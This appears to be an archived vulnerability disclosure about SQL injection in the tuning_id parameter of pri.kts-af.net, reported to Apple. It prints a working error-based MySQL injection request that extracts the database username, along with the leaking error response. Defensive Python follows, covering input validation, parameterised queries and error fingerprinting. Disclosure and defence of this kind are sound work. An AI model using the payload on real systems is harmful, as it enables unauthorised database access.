Anti-Phishing Research, Tombstones

Wednesday, May 23, 2012

RESOLVED: SQL Injection, XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, pri.kts-af.net, CWE-89, Database Admin


Reported to Apple Product Security on 9-27-2011

Summary

Severity:  High
Confidence:  Firm
Host:  http://pri.kts-af.net
Path:  /xml/index.xml

Issue detail

The tuning_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the tuning_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.


Subsequent queries showed the Database User to be ADMIN!

XSS.Cx SQLi PoC to Confirm Database Username
Fingerprinted 9-27-2011 by XSS.Cx Anti-Phishing Trawler
Keywords: Blind, Boolean, SQL, Injection, CWE-89, CAPEC-66, MySQL, Database, Admin, Extraction, Apple, pri.kts-af.net
==============================================================================================================================
Complete Application Request | HTTP GET
==============================================================================================================================
GET /xml/index.xml?sid=09A05772824906D82E3679D21CB1158B&tuning_id=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20user())%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: pri.kts-af.net
Accept-Encoding: gzip, deflate
==============================================================================================================================
Complete Application Response | HTTP RESPONSE
==============================================================================================================================
HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 11:47:17 GMT
Server: Apache/1.3.41 (Darwin) PHP/4.4.9
Cache-Control: no-cache, must-revalidate
Expires: Mon, 02 Feb 1970 18:00:00 GMT
X-Powered-By: PHP/4.4.9
Last-Modified: Wed, 28 Sep 2011 11:47:17 GMT
Cneonction: close
Content-Type: text/xml
Content-Length: 966


</td></tr></table><b>Database error:</b> Invalid SQL: SELECT t.station_id, t.menu_sequence FROM tuning t LEFT JOIN stations s ON t.station_id=s.station_id LEFT JOIN station_urls u ON t.station_id=u.station_id LEFT JOIN stream_types st ON u.stream_type_id=st.stream_type_id LEFT JOIN station_url_clients cu on s.station_id=cu.station_id WHERE parent_tuning_id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),(SELECT user()),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) AND type='S' AND t.valid='Y' AND s.approved='Y' AND s.type_code != 'W' AND cu.url_no=u.url_no AND cu.client_id=1 AND cu.approved='Y' AND ( u.stream_type_id IN (6,21) AND u.web_play != 'S'


 ) AND cu.test_status = 'P' GROUP BY s.station_id ORDER BY t.menu_sequence, s.station, s.station_id LIMIT 0,1000<br>
<b>MySQL Error</b>: 1062 (Duplicate entry '_!@kbws5@localhost_!@:1' for key 1)<br>
Session halted.
==============================================================================================================================
CWE-89 Fingerprint in Application Response | HTTP RESPONSE FINGERPRINT
==============================================================================================================================
(Duplicate entry '_!@kbws5@localhost_!@:1' for key 1)
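The two defender-side checks this report points at are (1) the tuning_id parameter is a numeric key and should never reach the query as free text, and (2) the verbose "Database error ... MySQL Error: 1062 (Duplicate entry ...)" page is itself the detectable artefact, because whatever the query concatenated into the duplicate key is echoed back to the client. The following is an added example, not code from the XSS.Cx report or from the pri.kts-af.net application (whose PHP source is not shown): it validates the parameter with an allow-list, runs the lookup as a parameterised query against an in-memory SQLite stand-in for the MySQL schema (column names taken from the error message, table contents constructed), and scans a response body for the CWE-89 fingerprint. The sid value and the request lines are constructed; only the 1062 error line is taken from the report.

```python
import re
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Constructed sample requests (not captured traffic). SID_PLACEHOLDER stands in
# for a session id; the probe carries the single quote the report says was sent.
BENIGN_REQUEST = "GET /xml/index.xml?sid=SID_PLACEHOLDER&tuning_id=4711 HTTP/1.1"
PROBE_REQUEST = "GET /xml/index.xml?sid=SID_PLACEHOLDER&tuning_id=%27 HTTP/1.1"

# Response fragment built from the error lines shown in the report (query text elided).
ERROR_RESPONSE = (
    "<b>Database error:</b> Invalid SQL: SELECT t.station_id, t.menu_sequence FROM tuning t ...<br>\n"
    "<b>MySQL Error</b>: 1062 (Duplicate entry '_!@kbws5@localhost_!@:1' for key 1)<br>\n"
    "Session halted."
)

# tuning_id is a numeric key: accept only a short run of digits, nothing else.
TUNING_ID_RE = re.compile(r"[0-9]{1,10}")


def validate_tuning_id(raw):
    """Allow-list check; returns an int or None (no attempt to 'clean' bad input)."""
    if raw is None or not TUNING_ID_RE.fullmatch(raw):
        return None
    return int(raw)


def check_request(request_line):
    """Parse a request line and report whether tuning_id passes validation."""
    method, target, _version = request_line.split(" ", 2)
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    raw = query.get("tuning_id", [None])[0]      # parse_qs already URL-decodes
    value = validate_tuning_id(raw)
    return {"method": method, "raw": raw, "tuning_id": value, "accepted": value is not None}


def demo_db():
    """In-memory stand-in for the 'tuning' table named in the leaked query (rows constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tuning (tuning_id INTEGER, parent_tuning_id INTEGER, "
        "station_id INTEGER, menu_sequence INTEGER, valid TEXT)"
    )
    conn.executemany(
        "INSERT INTO tuning VALUES (?, ?, ?, ?, ?)",
        [(1, 4711, 10, 2, "Y"), (2, 4711, 11, 1, "Y"), (3, 4711, 12, 3, "N"), (4, 9, 13, 1, "Y")],
    )
    return conn


def lookup_station_ids(conn, tuning_id):
    """Parameterised form of the query shape in the error: the driver binds the value,
    so it is data, never SQL text."""
    cur = conn.execute(
        "SELECT station_id FROM tuning WHERE parent_tuning_id = ? AND valid = 'Y' "
        "ORDER BY menu_sequence",
        (tuning_id,),
    )
    return [row[0] for row in cur.fetchall()]


def handle_request(conn, request_line):
    """Validate first, then query; a rejected parameter gets a generic 400, not a DB error page."""
    req = check_request(request_line)
    if not req["accepted"]:
        return {"status": 400, "error": "invalid tuning_id"}
    return {"status": 200, "station_ids": lookup_station_ids(conn, req["tuning_id"])}


# Response-side fingerprints: the verbose error page and the MySQL 1062 duplicate-key line.
FINGERPRINTS = {
    "verbose_db_error": re.compile(r"Database error:.*Invalid SQL:", re.S),
    "mysql_1062_duplicate_entry": re.compile(r"MySQL Error</b>: 1062 \(Duplicate entry '"),
}

# The report's marker pair _!@ ... _!@ brackets the value the query concatenated into the key.
LEAK_RE = re.compile(r"Duplicate entry '_!@(.*?)_!@:[01]' for key")


def scan_response(body):
    """Names of the fingerprints present in a response body (for log/IDS review)."""
    return [name for name, rx in FINGERPRINTS.items() if rx.search(body)]


def disclosed_value(body):
    """What the duplicate-key message hands back to the client, or None."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


if __name__ == "__main__":
    conn = demo_db()
    print(handle_request(conn, BENIGN_REQUEST))
    print(handle_request(conn, PROBE_REQUEST))
    print(scan_response(ERROR_RESPONSE), disclosed_value(ERROR_RESPONSE))
```

The validation and the parameterised query are independent layers: the allow-list stops the probe before any database round-trip, and binding the value means a key that does pass validation can still never change the statement. The fingerprint scan is what a WAF or log pipeline would run over outbound responses; the 1062 line is the same string the report lists as the CWE-89 fingerprint, and `disclosed_value` shows why error details must not reach the client.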
